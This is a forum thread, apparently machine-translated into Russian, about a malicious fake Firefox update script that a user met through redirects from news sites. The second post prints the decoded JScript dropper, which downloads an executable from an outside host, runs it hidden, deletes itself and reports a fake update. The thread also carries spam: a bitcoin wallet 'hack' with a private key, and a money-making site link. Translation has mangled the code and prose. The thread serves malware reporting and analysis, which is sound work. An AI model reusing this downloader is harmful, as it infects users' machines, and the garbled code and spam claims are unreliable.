Может кто-нибудь это декодировать?

Есть много сайтов, обновления поддельного браузера. Обычно я загружаю Scrypt и перейти к URL и направить вредоносный материал на VirusTotal, чтобы увидеть, как долго различные антивирусные сайты предпринять, чтобы обнаружить его. Это Scrypt хотя написано в тарабарщину, что, кажется, не имеют URL.

Все ZZZZZs добавляются разрывать связи

Он пришел из https: //feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
к которому я был злонамеренно перенаправлен из
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
или
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink

Сценарий выглядит следующим образом, вы можете декодировать его? Предупреждение это имеет что-то злонамеренное, что ни один антивирус не детектирует еще.

Символ [заменяется ZZZZZ

вар ggudez = 'vmaprc gvdfejfpuzexjmeez = Н \' г п {pymastiro swterAk = gnjezvriaXxcztncnebjttrOgbzclskWjrq (к"qSp.xtfhbiqpo) д"ILH; ietloesnt = ФБС rbeigtecgvz vAnjzbhOyeiexXiSy"п (fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy л; с = д"р) SAA iwycfnienXdexvuOwtqiutgcpez (ubtjfMdXlSkLu"bMxLjMzXjHl2d.y) е"DPH; cTiTpeqnm = MWK iddietpctve jAnjkbnOyeuehXaAs"г (zDbcdtcSa.hBgthOjDo"xmzaa) krkejlorouy = H; s hputctust"xhcetfq / тис: г / wfvosndabpain / qtxen1q.inx4a2w5l.y0e / е; г"ZTH bdsafedmmav = xffnmtuebGfSxbc.falitcclypjeke '; вар tcvj =' wdklhrhFiomSm + р) LTU (q2e.zgunrfurriwhhClmxamrjoaerduot (urtCd"е + р) n1n9x2w.z5k4lel2e3b р; е"wfhxyenadvg (zrbosri; B1K = DIV fixiy; l5m + т<у = Krity {VYT + J) zpvoz.der {gccEfGk"iTenl (brmun MLQ"я, slnahfdsa, т c.kcb; asfev) КНФ (qdkujeinrbl; п) brulsln} v; fkacievai (ahicqedajtjcgSuWkrg) а {fSr.ftwlbippe5t (aps0uevek} я; д) р} i0z0lprOz.ueh ddd.qdj xTbnq; х = г Hed cyjps.hdc tWz1x; о (keftfcaroieplsfeeof.nRhojBeerdgnfshde м; p.iyp) ztaiwsciuPwoa; j0h = г oohnubt (ы a.xiyfoeeehlsxwFnix (dsstjftiasz) sebmv) vnwaslvefDzebbu.glwinFz '; вар xkvof =' ewtkexmkapneed (lfs.adp LSK) я ; mojTbenFfaxvkfy (sepnxiulj; е) REW eanmhnbuyrw (gab.i.zdcmxel"ncgcx / х я lxdegrvtbSzil"г + trufe.kornigyrzakhxCvmrCz3e (reb4cocdpajnafmms) L + qrythSrixet + rrrfo.vocnfgeraaehoCymaCf3x (fex4zohdafo, r0aab) у, м; г) ее jlesnpa ВРБА wvxahcaSyWlro = х mSu.utscsiupzFstipqusrkiamfacNhezlllm mfmii (о, J flvijFeehby.btustiwsmElxqbm) г) ZD (wpjtdeblmekDbey ( xeolkpfFcitSlWx DCP) F; b.rtzpuEorlif"е (xojUecahfeoteah appdilypmmwejcroy) д"c.w; gtsebci к} ААС у Мей (DHK) rthcl ш v р е {V} е \ 'м; uvraird '; вар ujak =' iyhfgwlyeknpemflvtoig = у"n4t5g2q1d0y3y"O; vvtadrz poizlkklzrujosiub = vyufgwiyyklpemnlstcia.lliernpggtphd; cvjahrb zsqsmpjnpcgfxnyai = svsfojapqzaxfmeet.hleefnqgvtuhx / koyzzktlfrajtsvun; cvlaurz jccwsmcxrttlthsiyxxsm = fZZZZZb] г, wlxrmitgicktsxcmp = tZZZZZv] л; gvxawra XAG = D0p; ifvoirc (nvhazrz Mia = r0j; жид
Сейчас она набирает 0/54 на VirusTotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/

Через несколько дней он забьет 5 или 10/54

Через неделю или две 20 или 30/54

10 августа 2016, 2:52:54 AM	# 1
нет льда, пожалуйста, Сообщения: 606 Цитировать по имени цитировать ответ	Re: Может ли кто-нибудь это декодировать? Взлом Биткоин адресов. 500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome" Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e подробнее... Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru Есть много сайтов, обновления поддельного браузера. Обычно я загружаю Scrypt и перейти к URL и направить вредоносный материал на VirusTotal, чтобы увидеть, как долго различные антивирусные сайты предпринять, чтобы обнаружить его. Это Scrypt хотя написано в тарабарщину, что, кажется, не имеют URL. Все ZZZZZs добавляются разрывать связи Он пришел из https: //feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js к которому я был злонамеренно перенаправлен из http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html или http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink Сценарий выглядит следующим образом, вы можете декодировать его? Предупреждение это имеет что-то злонамеренное, что ни один антивирус не детектирует еще. Символ [заменяется ZZZZZ вар ggudez = 'vmaprc gvdfejfpuzexjmeez = Н \' г п {pymastiro swterAk = gnjezvriaXxcztncnebjttrOgbzclskWjrq (к"qSp.xtfhbiqpo) д"ILH; ietloesnt = ФБС rbeigtecgvz vAnjzbhOyeiexXiSy"п (fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy л; с = д"р) SAA iwycfnienXdexvuOwtqiutgcpez (ubtjfMdXlSkLu"bMxLjMzXjHl2d.y) е"DPH; cTiTpeqnm = MWK iddietpctve jAnjkbnOyeuehXaAs"г (zDbcdtcSa.hBgthOjDo"xmzaa) krkejlorouy = H; s hputctust"xhcetfq / тис: г / wfvosndabpain / qtxen1q.inx4a2w5l.y0e / е; г"ZTH bdsafedmmav = xffnmtuebGfSxbc.falitcclypjeke '; вар tcvj =' wdklhrhFiomSm + р) LTU (q2e.zgunrfurriwhhClmxamrjoaerduot (urtCd"е + р) n1n9x2w.z5k4lel2e3b р; е"wfhxyenadvg (zrbosri; B1K = DIV fixiy; l5m + т<у = Krity {VYT + J) zpvoz.der {gccEfGk"iTenl (brmun MLQ"я, slnahfdsa, т c.kcb; asfev) КНФ (qdkujeinrbl; п) brulsln} v; fkacievai (ahicqedajtjcgSuWkrg) а {fSr.ftwlbippe5t (aps0uevek} я; д) р} i0z0lprOz.ueh ddd.qdj xTbnq; х = г Hed cyjps.hdc tWz1x; о (keftfcaroieplsfeeof.nRhojBeerdgnfshde м; p.iyp) ztaiwsciuPwoa; j0h = г oohnubt (ы a.xiyfoeeehlsxwFnix (dsstjftiasz) sebmv) vnwaslvefDzebbu.glwinFz '; вар xkvof =' ewtkexmkapneed (lfs.adp LSK) я ; mojTbenFfaxvkfy (sepnxiulj; е) REW eanmhnbuyrw (gab.i.zdcmxel"ncgcx / х я lxdegrvtbSzil"г + trufe.kornigyrzakhxCvmrCz3e (reb4cocdpajnafmms) L + qrythSrixet + rrrfo.vocnfgeraaehoCymaCf3x (fex4zohdafo, r0aab) у, м; г) ее jlesnpa ВРБА wvxahcaSyWlro = х mSu.utscsiupzFstipqusrkiamfacNhezlllm mfmii (о, J flvijFeehby.btustiwsmElxqbm) г) ZD (wpjtdeblmekDbey ( xeolkpfFcitSlWx DCP) F; b.rtzpuEorlif"е (xojUecahfeoteah appdilypmmwejcroy) д"c.w; gtsebci к} ААС у Мей (DHK) rthcl ш v р е {V} е \ 'м; uvraird '; вар ujak =' iyhfgwlyeknpemflvtoig = у"n4t5g2q1d0y3y"O; vvtadrz poizlkklzrujosiub = vyufgwiyyklpemnlstcia.lliernpggtphd; cvjahrb zsqsmpjnpcgfxnyai = svsfojapqzaxfmeet.hleefnqgvtuhx / koyzzktlfrajtsvun; cvlaurz jccwsmcxrttlthsiyxxsm = fZZZZZb] г, wlxrmitgicktsxcmp = tZZZZZv] л; gvxawra XAG = D0p; ifvoirc (nvhazrz Mia = r0j; жид Сейчас она набирает 0/54 на VirusTotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/ Через несколько дней он забьет 5 или 10/54 Через неделю или две 20 или 30/54

11 августа 2016, 3:25:29 AM	# 2
нет льда, пожалуйста, Сообщения: 606 Цитировать по имени цитировать ответ	Re: Может ли кто-нибудь это декодировать? Получил 1806 Биткоинов Реальная история. В случае, если кто-то интересно, я разместил его на другом сайте и кто-то взломали. http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/ Расшифровал скрипт, с ХХХХМ добавляемым выше бредом является котировка пытаться { а = новый ActiveXObject ("Wscript.Shell"); б = новый ActiveXObject ("Scripting.FileSystemObject"); с = новый ActiveXObject ("Msxml2.XMLHTTP"); д = новый ActiveXObject ("ADODB.Stream"); URL = "https: / XXXXX / feipinofa .netXXXXX / 10 / 524.dat"; Fname = b.GetSpecialFolder (2) + String.fromCharCode (92) + "12345.exe"; для (вар я = 1; я <= 5; я ++) { пытаться { c.open ("ПОЛУЧИТЬ", URL, ложь); c.send (нуль); ломать; } Поймать (е) { WScript.Sleep (5000); } } d.Open; d.Type = 1; d.Write (c.ResponseBody); d.Position = 0; если (b.Fileexists (имя_файла)) b.DeleteFile (имя_файла); d.SaveToFile (имя_файла); a.run ("cmd.exe / с " + String.fromCharCode (34) + Fname + String.fromCharCode (34), 0, ложно); вар р = WScript.ScriptFullName; если (b.FileExists (р)) b.DeleteFile (р); WScript.Echo ("Обновление завершено."); } Поймать (е) {}

11 августа 2016, 3:12:41 PM	# 3
десять кубометров Сообщения: 294 Цитировать по имени цитировать ответ	Re: Может ли кто-нибудь это декодировать? Означает ли это, что кто-то пытается взломать компьютеры людей, спрашивая их, чтобы скачать бесплатные браузеры? Ничего себе, существует реальная необходимость осторожности в наши дни.

Заголовок